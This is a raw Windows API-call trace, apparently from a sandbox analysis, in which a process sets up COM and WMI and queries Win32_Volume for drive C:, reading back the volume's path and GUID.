	[0258.566] WbemLocator:IUnknown:QueryInterface (in: This=0x626de2c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae248 | out: ppvObject=0x5eae248*=0x3ae65c) returned 0x0
	[0258.566] WbemLocator:IClientSecurity:SetBlanket (This=0x3ae65c, pProxy=0x626de2c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0258.566] WbemLocator:IUnknown:Release (This=0x3ae65c) returned 0x2
	[0258.566] WbemLocator:IUnknown:Release (This=0x3ae67c) returned 0x1
	[0258.566] CoTaskMemFree (pv=0x3acd50) 
	[0258.566] WbemLocator:IUnknown:Release (This=0x626cb70) returned 0x0
	[0258.566] WbemLocator:IUnknown:QueryInterface (in: This=0x626de2c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadc08 | out: ppvObject=0x5eadc08*=0x3ae67c) returned 0x0
	[0258.567] WbemLocator:IUnknown:QueryInterface (in: This=0x3ae67c, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5eadbc4 | out: ppvObject=0x5eadbc4*=0x0) returned 0x80004002
	[0258.567] WbemLocator:IUnknown:QueryInterface (in: This=0x3ae67c, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5eadab8 | out: ppvObject=0x5eadab8*=0x0) returned 0x80004002
	[0258.568] WbemLocator:IUnknown:AddRef (This=0x3ae67c) returned 0x3
	[0258.568] CoGetContextToken (in: pToken=0x5eada50 | out: pToken=0x5eada50) returned 0x0
	[0258.568] WbemLocator:IUnknown:QueryInterface (in: This=0x3ae67c, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eada38 | out: ppvObject=0x5eada38*=0x3ae5dc) returned 0x0
	[0258.568] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x3ae5dc, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5eada40 | out: pCid=0x5eada40*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0258.568] WbemLocator:IUnknown:Release (This=0x3ae5dc) returned 0x3
	[0258.568] CoGetContextToken (in: pToken=0x5eada48 | out: pToken=0x5eada48) returned 0x0
	[0258.569] WbemLocator:IUnknown:AddRef (This=0x3ae67c) returned 0x4
	[0258.569] WbemLocator:IUnknown:QueryInterface (in: This=0x3ae67c, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadabc | out: ppvObject=0x5eadabc*=0x3ae664) returned 0x0
	[0258.569] WbemLocator:IUnknown:Release (This=0x3ae67c) returned 0x4
	[0258.569] WbemLocator:IRpcOptions:Query (in: This=0x3ae664, pPrx=0x3ae67c, dwProperty=2, pdwValue=0x5eadae0 | out: pdwValue=0x5eadae0) returned 0x80004002
	[0258.569] WbemLocator:IUnknown:Release (This=0x3ae664) returned 0x3
	[0258.569] WbemLocator:IUnknown:Release (This=0x3ae67c) returned 0x2
	[0258.569] CoGetContextToken (in: pToken=0x5eadebc | out: pToken=0x5eadebc) returned 0x0
	[0258.569] CoGetContextToken (in: pToken=0x5eade7c | out: pToken=0x5eade7c) returned 0x0
	[0258.569] WbemLocator:IUnknown:AddRef (This=0x3ae67c) returned 0x3
	[0258.569] WbemLocator:IUnknown:QueryInterface (in: This=0x3ae67c, riid=0x5eadef8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x5eadef4 | out: ppvObject=0x5eadef4*=0x626de2c) returned 0x0
	[0258.570] WbemLocator:IUnknown:Release (This=0x3ae67c) returned 0x3
	[0258.570] WbemLocator:IUnknown:Release (This=0x626de2c) returned 0x2
	[0258.570] WbemLocator:IUnknown:Release (This=0x626de2c) returned 0x1
	[0258.570] CoGetContextToken (in: pToken=0x5eae7d8 | out: pToken=0x5eae7d8) returned 0x0
	[0258.570] WbemLocator:IUnknown:AddRef (This=0x3ae67c) returned 0x2
	[0258.570] WbemLocator:IUnknown:QueryInterface (in: This=0x3ae67c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae3fc | out: ppvObject=0x5eae3fc*=0x3ae67c) returned 0x0
	[0258.571] WbemLocator:IUnknown:Release (This=0x3ae67c) returned 0x2
	[0258.571] WbemLocator:IUnknown:Release (This=0x3ae67c) returned 0x1
	[0258.571] CoGetContextToken (in: pToken=0x5eadfdc | out: pToken=0x5eadfdc) returned 0x0
	[0258.571] CoGetContextToken (in: pToken=0x5eadf9c | out: pToken=0x5eadf9c) returned 0x0
	[0258.571] WbemLocator:IUnknown:AddRef (This=0x3ae67c) returned 0x2
	[0258.571] WbemLocator:IUnknown:QueryInterface (in: This=0x3ae67c, riid=0x5eae018*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x5eae014 | out: ppvObject=0x5eae014*=0x626de2c) returned 0x0
	[0258.571] WbemLocator:IUnknown:Release (This=0x3ae67c) returned 0x2
	[0258.571] WbemLocator:IUnknown:AddRef (This=0x626de2c) returned 0x3
	[0258.571] IWbemServices:ExecQuery (in: This=0x626de2c, strQueryLanguage="WQL", strQuery="select * from Win32_Volume where Name='C:\\\\'", lFlags=16, pCtx=0x0, ppEnum=0x5eae620 | out: ppEnum=0x5eae620*=0x626cb34) returned 0x0
	[0258.574] IUnknown:QueryInterface (in: This=0x626cb34, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae2cc | out: ppvObject=0x5eae2cc*=0x626cb38) returned 0x0
	[0258.575] IClientSecurity:QueryBlanket (in: This=0x626cb38, pProxy=0x626cb34, pAuthnSvc=0x5eae314, pAuthzSvc=0x5eae310, pServerPrincName=0x5eae320, pAuthnLevel=0x5eae318, pImpLevel=0x5eae304, pAuthInfo=0x5eae308, pCapabilites=0x5eae30c | out: pAuthnSvc=0x5eae314*=0xa, pAuthzSvc=0x5eae310*=0x0, pServerPrincName=0x5eae320, pAuthnLevel=0x5eae318*=0x6, pImpLevel=0x5eae304*=0x2, pAuthInfo=0x5eae308, pCapabilites=0x5eae30c*=0x1) returned 0x0
	[0258.575] IUnknown:Release (This=0x626cb38) returned 0x1
	[0258.575] IUnknown:QueryInterface (in: This=0x626cb34, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae2c0 | out: ppvObject=0x5eae2c0*=0x3b5e74) returned 0x0
	[0258.575] IUnknown:QueryInterface (in: This=0x626cb34, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae2bc | out: ppvObject=0x5eae2bc*=0x626cb38) returned 0x0
	[0258.575] IClientSecurity:SetBlanket (This=0x626cb38, pProxy=0x626cb34, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0258.577] IUnknown:Release (This=0x626cb38) returned 0x2
	[0258.577] WbemLocator:IUnknown:Release (This=0x3b5e74) returned 0x1
	[0258.577] CoTaskMemFree (pv=0x3acd80) 
	[0258.577] WbemLocator:IUnknown:Release (This=0x626de2c) returned 0x2
	[0258.577] IUnknown:QueryInterface (in: This=0x626cb34, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadc78 | out: ppvObject=0x5eadc78*=0x3b5e74) returned 0x0
	[0258.577] WbemLocator:IUnknown:QueryInterface (in: This=0x3b5e74, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5eadc34 | out: ppvObject=0x5eadc34*=0x0) returned 0x80004002
	[0258.578] WbemLocator:IUnknown:QueryInterface (in: This=0x3b5e74, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5eadb28 | out: ppvObject=0x5eadb28*=0x0) returned 0x80004002
	[0258.579] WbemLocator:IUnknown:AddRef (This=0x3b5e74) returned 0x3
	[0258.579] CoGetContextToken (in: pToken=0x5eadac0 | out: pToken=0x5eadac0) returned 0x0
	[0258.579] WbemLocator:IUnknown:QueryInterface (in: This=0x3b5e74, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadaa8 | out: ppvObject=0x5eadaa8*=0x3b5dd4) returned 0x0
	[0258.579] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x3b5dd4, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5eadab0 | out: pCid=0x5eadab0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0258.579] WbemLocator:IUnknown:Release (This=0x3b5dd4) returned 0x3
	[0258.579] CoGetContextToken (in: pToken=0x5eadab8 | out: pToken=0x5eadab8) returned 0x0
	[0258.579] WbemLocator:IUnknown:AddRef (This=0x3b5e74) returned 0x4
	[0258.579] WbemLocator:IUnknown:QueryInterface (in: This=0x3b5e74, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadb2c | out: ppvObject=0x5eadb2c*=0x3b5e5c) returned 0x0
	[0258.580] WbemLocator:IUnknown:Release (This=0x3b5e74) returned 0x4
	[0258.580] WbemLocator:IRpcOptions:Query (in: This=0x3b5e5c, pPrx=0x3b5e74, dwProperty=2, pdwValue=0x5eadb50 | out: pdwValue=0x5eadb50) returned 0x80004002
	[0258.580] WbemLocator:IUnknown:Release (This=0x3b5e5c) returned 0x3
	[0258.580] WbemLocator:IUnknown:Release (This=0x3b5e74) returned 0x2
	[0258.580] CoGetContextToken (in: pToken=0x5eadf2c | out: pToken=0x5eadf2c) returned 0x0
	[0258.580] CoGetContextToken (in: pToken=0x5eadeec | out: pToken=0x5eadeec) returned 0x0
	[0258.580] WbemLocator:IUnknown:AddRef (This=0x3b5e74) returned 0x3
	[0258.580] WbemLocator:IUnknown:QueryInterface (in: This=0x3b5e74, riid=0x5eadf68*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5eadf64 | out: ppvObject=0x5eadf64*=0x626cb34) returned 0x0
	[0258.580] WbemLocator:IUnknown:Release (This=0x3b5e74) returned 0x3
	[0258.581] IUnknown:Release (This=0x626cb34) returned 0x2
	[0258.581] IUnknown:Release (This=0x626cb34) returned 0x1
	[0258.581] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x626d3d8, puCount=0x5eae8b8 | out: puCount=0x5eae8b8*=0x2) returned 0x0
	[0258.581] WbemDefPath:IWbemPath:GetText (in: This=0x626d3d8, lFlags=4, puBuffLength=0x5eae8b4*=0x0, pszText=0x0 | out: puBuffLength=0x5eae8b4*=0x17, pszText=0x0) returned 0x0
	[0258.581] WbemDefPath:IWbemPath:GetText (in: This=0x626d3d8, lFlags=4, puBuffLength=0x5eae8b4*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae8b4*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0258.581] CoGetContextToken (in: pToken=0x5eae254 | out: pToken=0x5eae254) returned 0x0
	[0258.581] CoGetContextToken (in: pToken=0x5eae214 | out: pToken=0x5eae214) returned 0x0
	[0258.581] WbemLocator:IUnknown:AddRef (This=0x3b5e74) returned 0x2
	[0258.581] WbemLocator:IUnknown:QueryInterface (in: This=0x3b5e74, riid=0x5eae290*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5eae28c | out: ppvObject=0x5eae28c*=0x626cb34) returned 0x0
	[0258.581] WbemLocator:IUnknown:Release (This=0x3b5e74) returned 0x2
	[0258.582] IUnknown:AddRef (This=0x626cb34) returned 0x3
	[0258.582] IEnumWbemClassObject:Clone (in: This=0x626cb34, ppEnum=0x5eae888 | out: ppEnum=0x5eae888*=0x626decc) returned 0x0
	[0258.583] IUnknown:QueryInterface (in: This=0x626decc, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae544 | out: ppvObject=0x5eae544*=0x626ded0) returned 0x0
	[0258.583] IClientSecurity:QueryBlanket (in: This=0x626ded0, pProxy=0x626decc, pAuthnSvc=0x5eae58c, pAuthzSvc=0x5eae588, pServerPrincName=0x5eae598, pAuthnLevel=0x5eae590, pImpLevel=0x5eae57c, pAuthInfo=0x5eae580, pCapabilites=0x5eae584 | out: pAuthnSvc=0x5eae58c*=0xa, pAuthzSvc=0x5eae588*=0x0, pServerPrincName=0x5eae598, pAuthnLevel=0x5eae590*=0x6, pImpLevel=0x5eae57c*=0x2, pAuthInfo=0x5eae580, pCapabilites=0x5eae584*=0x1) returned 0x0
	[0258.583] IUnknown:Release (This=0x626ded0) returned 0x1
	[0258.583] IUnknown:QueryInterface (in: This=0x626decc, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae538 | out: ppvObject=0x5eae538*=0x3b336c) returned 0x0
	[0258.583] IUnknown:QueryInterface (in: This=0x626decc, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae534 | out: ppvObject=0x5eae534*=0x626ded0) returned 0x0
	[0258.583] IClientSecurity:SetBlanket (This=0x626ded0, pProxy=0x626decc, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0258.585] IUnknown:Release (This=0x626ded0) returned 0x2
	[0258.585] WbemLocator:IUnknown:Release (This=0x3b336c) returned 0x1
	[0258.585] CoTaskMemFree (pv=0x3acd50) 
	[0258.586] IUnknown:Release (This=0x626cb34) returned 0x2
	[0258.586] IUnknown:QueryInterface (in: This=0x626decc, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadee0 | out: ppvObject=0x5eadee0*=0x3b336c) returned 0x0
	[0258.586] WbemLocator:IUnknown:QueryInterface (in: This=0x3b336c, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5eade9c | out: ppvObject=0x5eade9c*=0x0) returned 0x80004002
	[0258.587] WbemLocator:IUnknown:QueryInterface (in: This=0x3b336c, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5eadd90 | out: ppvObject=0x5eadd90*=0x0) returned 0x80004002
	[0258.587] WbemLocator:IUnknown:AddRef (This=0x3b336c) returned 0x3
	[0258.587] CoGetContextToken (in: pToken=0x5eadd28 | out: pToken=0x5eadd28) returned 0x0
	[0258.587] WbemLocator:IUnknown:QueryInterface (in: This=0x3b336c, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadd10 | out: ppvObject=0x5eadd10*=0x3b32cc) returned 0x0
	[0258.589] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x3b32cc, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5eadd18 | out: pCid=0x5eadd18*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0258.589] WbemLocator:IUnknown:Release (This=0x3b32cc) returned 0x3
	[0258.589] CoGetContextToken (in: pToken=0x5eadd20 | out: pToken=0x5eadd20) returned 0x0
	[0258.589] WbemLocator:IUnknown:AddRef (This=0x3b336c) returned 0x4
	[0258.589] WbemLocator:IUnknown:QueryInterface (in: This=0x3b336c, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadd94 | out: ppvObject=0x5eadd94*=0x3b3354) returned 0x0
	[0258.589] WbemLocator:IUnknown:Release (This=0x3b336c) returned 0x4
	[0258.589] WbemLocator:IRpcOptions:Query (in: This=0x3b3354, pPrx=0x3b336c, dwProperty=2, pdwValue=0x5eaddb8 | out: pdwValue=0x5eaddb8) returned 0x80004002
	[0258.589] WbemLocator:IUnknown:Release (This=0x3b3354) returned 0x3
	[0258.590] WbemLocator:IUnknown:Release (This=0x3b336c) returned 0x2
	[0258.590] CoGetContextToken (in: pToken=0x5eae194 | out: pToken=0x5eae194) returned 0x0
	[0258.590] CoGetContextToken (in: pToken=0x5eae154 | out: pToken=0x5eae154) returned 0x0
	[0258.590] WbemLocator:IUnknown:AddRef (This=0x3b336c) returned 0x3
	[0258.590] WbemLocator:IUnknown:QueryInterface (in: This=0x3b336c, riid=0x5eae1d0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5eae1cc | out: ppvObject=0x5eae1cc*=0x626decc) returned 0x0
	[0258.590] WbemLocator:IUnknown:Release (This=0x3b336c) returned 0x3
	[0258.590] IUnknown:Release (This=0x626decc) returned 0x2
	[0258.590] IUnknown:Release (This=0x626decc) returned 0x1
	[0258.590] CoGetContextToken (in: pToken=0x5eae788 | out: pToken=0x5eae788) returned 0x0
	[0258.591] CoGetContextToken (in: pToken=0x5eae748 | out: pToken=0x5eae748) returned 0x0
	[0258.591] WbemLocator:IUnknown:AddRef (This=0x3b336c) returned 0x2
	[0258.591] WbemLocator:IUnknown:QueryInterface (in: This=0x3b336c, riid=0x5eae7c4*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5eae7c0 | out: ppvObject=0x5eae7c0*=0x626decc) returned 0x0
	[0258.591] WbemLocator:IUnknown:Release (This=0x3b336c) returned 0x2
	[0258.591] IUnknown:AddRef (This=0x626decc) returned 0x3
	[0258.591] IEnumWbemClassObject:Reset (This=0x626decc) returned 0x0
	[0258.592] IUnknown:Release (This=0x626decc) returned 0x2
	[0258.592] CoGetContextToken (in: pToken=0x5eae67c | out: pToken=0x5eae67c) returned 0x0
	[0258.592] IUnknown:AddRef (This=0x626decc) returned 0x3
	[0258.592] IEnumWbemClassObject:Next (in: This=0x626decc, lTimeout=-1, uCount=0x1, apObjects=0x38ef70, puReturned=0x2fb1c30 | out: apObjects=0x38ef70*=0x626df08, puReturned=0x2fb1c30*=0x1) returned 0x0
	[0258.654] IUnknown:QueryInterface (in: This=0x626df08, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadc88 | out: ppvObject=0x5eadc88*=0x626df08) returned 0x0
	[0258.655] IUnknown:QueryInterface (in: This=0x626df08, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5eadc44 | out: ppvObject=0x5eadc44*=0x0) returned 0x80004002
	[0258.655] IUnknown:QueryInterface (in: This=0x626df08, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5eadb38 | out: ppvObject=0x5eadb38*=0x0) returned 0x80004002
	[0258.655] IUnknown:AddRef (This=0x626df08) returned 0x3
	[0258.655] CoGetContextToken (in: pToken=0x5eadad0 | out: pToken=0x5eadad0) returned 0x0
	[0258.655] IUnknown:QueryInterface (in: This=0x626df08, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadab8 | out: ppvObject=0x5eadab8*=0x626df0c) returned 0x0
	[0258.656] IMarshal:GetUnmarshalClass (in: This=0x626df0c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5eadac0 | out: pCid=0x5eadac0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0
	[0258.656] IUnknown:Release (This=0x626df0c) returned 0x3
	[0258.656] CoGetContextToken (in: pToken=0x5eadac8 | out: pToken=0x5eadac8) returned 0x0
	[0258.656] IUnknown:AddRef (This=0x626df08) returned 0x4
	[0258.656] IUnknown:QueryInterface (in: This=0x626df08, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadb3c | out: ppvObject=0x5eadb3c*=0x0) returned 0x80004002
	[0258.656] IUnknown:Release (This=0x626df08) returned 0x3
	[0258.656] IUnknown:Release (This=0x626df08) returned 0x2
	[0258.657] CoGetContextToken (in: pToken=0x5eadf28 | out: pToken=0x5eadf28) returned 0x0
	[0258.657] CoGetContextToken (in: pToken=0x5eadee8 | out: pToken=0x5eadee8) returned 0x0
	[0258.657] IUnknown:AddRef (This=0x626df08) returned 0x3
	[0258.657] IUnknown:QueryInterface (in: This=0x626df08, riid=0x5eadf64*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x5eadf60 | out: ppvObject=0x5eadf60*=0x626df08) returned 0x0
	[0258.657] IUnknown:Release (This=0x626df08) returned 0x3
	[0258.657] IUnknown:Release (This=0x626df08) returned 0x2
	[0258.657] IUnknown:Release (This=0x626df08) returned 0x1
	[0258.657] IUnknown:Release (This=0x626decc) returned 0x2
	[0258.657] CoGetContextToken (in: pToken=0x5eae80c | out: pToken=0x5eae80c) returned 0x0
	[0258.657] IUnknown:AddRef (This=0x626df08) returned 0x2
	[0258.658] IWbemClassObject:Get (in: This=0x626df08, wszName="__GENUS", lFlags=0, pVal=0x5eae888*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x5eae93c*=0, plFlavor=0x5eae938*=0 | out: pVal=0x5eae888*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x5eae93c*=3, plFlavor=0x5eae938*=64) returned 0x0
	[0258.658] IWbemClassObject:Get (in: This=0x626df08, wszName="__PATH", lFlags=0, pVal=0x5eae868*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x5eae920*=0, plFlavor=0x5eae91c*=0 | out: pVal=0x5eae868*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"", varVal2=0x0), pType=0x5eae920*=8, plFlavor=0x5eae91c*=64) returned 0x0
	[0258.658] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x64
	[0258.658] CoGetObjectContext (in: riid=0x2b3adb0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5eae8c0 | out: ppv=0x5eae8c0*=0x2d8dec) returned 0x0
	[0258.658] IComThreadingInfo:GetCurrentApartmentType (in: This=0x2d8dec, pAptType=0x5eae8b8 | out: pAptType=0x5eae8b8*=1) returned 0x0
	[0258.659] IUnknown:QueryInterface (in: This=0x2d8dec, riid=0x2b3ad98*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5eae8bc | out: ppvObject=0x5eae8bc*=0x0) returned 0x80004002
	[0258.659] IUnknown:Release (This=0x2d8dec) returned 0x1
